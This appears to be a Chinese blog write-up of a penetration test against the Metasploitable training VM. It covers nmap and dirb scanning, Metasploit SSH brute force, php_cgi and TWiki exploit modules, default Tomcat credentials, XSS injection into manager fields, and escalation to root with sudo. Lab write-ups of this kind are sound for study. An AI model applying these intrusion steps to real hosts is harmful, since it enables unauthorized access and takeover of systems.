Metasploitable渗透测试
Metasploitable靶机渗透测试报告
- 使用
arp-scan -l发现目标靶机的IP地址是192.168.5.135
1 | arp-scan -l |
- 使用
nmap -sS -sV -sC -p- 192.168.5.135发现目标靶机开启了:21,22,23,25,53,80,139,445,3306,5432,8009,8180端口。
1 | nmap -sS -sV -sC -p- 192.168.5.135 |
- 使用
dirb ``http://192.168.5.135/扫描目标IP目录。
1 | dirb http://192.168.5.135/ |
- 使用
dirb ``http://192.168.11.13``5:8180扫描目标IP目录。
1 | dirb http://192.168.11.135:8180 |
用版本号看看有没有漏洞
除了1.3.1其他都有我服了
网上搜索扫描发现是有漏洞的
用msfconsle进一步探测
1 | search ssh_login |
- 这里我们选择模块0进行暴力破解。
1 | use 0 |
- 之后配置好域名,账号密码字典以及线程数即可。
1 | set RHOST 192.168.5.135 |
- 开始运行,可以看到成功地拿到了连接的账号密码。
用 msfconsole 扫描漏洞
用这个漏洞模块
其实是可以知道默认账密的,网上能扫到,但是还是选择暴力破解
使用 telnet 连接
1 | telnet 192.168.5.135 |
在网上可以搜到这个版本的 php 有远程代码连接漏洞
在 msfconsole 里面搜索
1 | search php_cgi |
使用第一个也就是 use 0
使用攻击模块,做好配置
1 | set rhost 192.168.5.135 |
2.5 80端口的 Twiki
在 msfconsole 中搜索它的 nday
用 search Twiki
发现第二个可能是我们可以用到的
1 | use 1 |
然后配置我们的攻击模块
1 | set rhost 192.168.5.135 |
8180的Apache服务我们可以通过暴力破解获得账号密码
账密都为 tomcat
就可以登录到管理员页面
- 新建一个Mail Session,在内容里面植入XSS恶意代码。
- 成功弹窗。
- 新建一个Environment Entries,在内容里面植入XSS恶意代码。
- 成功弹窗。
- 编辑已有的User Databases,在内容里面植入XSS恶意代码。
- 成功弹窗。
- 可以编辑已有的用户或者新建用户,编辑它们的Full Name选项,在其中植入XSS恶意代码。
- 成功弹窗。
- 创建新的Groups,组名(Group Name)和描述(Description)栏都可以插入XSS恶意代码。
- 成功弹窗。
- 创建新的规则,其中规则名(Role Name)和描述(Description)栏都可以植入XSS恶意代码,或者编辑已有用户的描述(Description)向其中植入XSS恶意代码。
- 成功弹窗。
用刚刚 telnet 登录的地方提权
我们刚刚已经拿到了用户密码,所以这里直接切换成root用户就可以实现提权。
1 | sudo su |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Tubby Little Hero!






